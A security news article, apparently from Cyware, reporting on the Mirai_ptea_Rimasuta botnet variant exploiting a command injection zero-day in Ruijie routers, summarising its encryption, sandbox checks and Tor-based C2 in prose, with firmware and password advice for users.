Mirai_ptea_Rimasuta, an old and unpopular variant of Mirai, has surfaced again, abusing a zero-day vulnerability in RUIJIE router devices.

What has happened?

The botnet was first spotted in June as Mirai_ptea, abusing an unknown vulnerability in KGUARD DVR. Then, it didn’t seem like a bigger deal to researchers.
  • The recently exploited vulnerability in Ruijie routers is a command injection flaw that exists in the RUJIE NBR700 series routers.
  • According to the research, a large number of online devices are exposed to this vulnerability. 
  • Some of these identified device versions include NBR1600GDX9, RGNBR700GDX5, and more.

How does it work?

  • During exploitation, a payload is used that has a URL and uses several empty variables probably to misguide security teams. When these variables are removed, it turns into a malicious function that can download and run the malware sample.
  • Actors behind Mirai_ptea_Rimasuta have redesigned its encryption algorithm and C2 communication protocol; it uses the TEA algorithm and encrypts other sensitive resource info such as Tor Proxy.
  • Its communication is divided into three steps: first, it establishes a connection with the proxy node, then Tor C2, and communicates with C2 via ptea's custom protocol to receive commands.

Digging deeper

In their detailed information, researchers have divided the analysis into multiple stages/components to make it simple to understand.
  • TEA key: Mirai_ptea_Rimasuta sample comes with two sets of Tiny Encryption Algorithm (TEA) keys, one for encrypting and decrypting sensitive resources, while the other is for encrypting and decrypting network traffic.
  • Sandbox detection: The variant checks for the presence of a large number of sandboxes or simulators, and proceeds with infection only when its path and filename-related requirements are met.
  • C2 variation: Mirai_ptea_Rimasuta uses some specific code to reach the Tor C2, which reveals that there are around six C2s used by this malware.
  • Network protocol change: It encrypts the network traffic and has a hard-coded set of keys Net_teakey. The key is dynamically created by negotiating with C2s.
  • Information gathering function: It monitors the TCP network connections of the infected device. Then, uploads the connection info (by data mining) that meets certain requirements to the Reporter.

Conclusion

The new zero-day attack capability of Mirai_ptea_Rimasuta indicates that operators of this malware may have bigger plans for the future. Furthermore, users of Ruijie routers are suggested to check and update the system firmware regularly and use a strong password for the management interface.

Cyware Publisher

Publisher

Cyware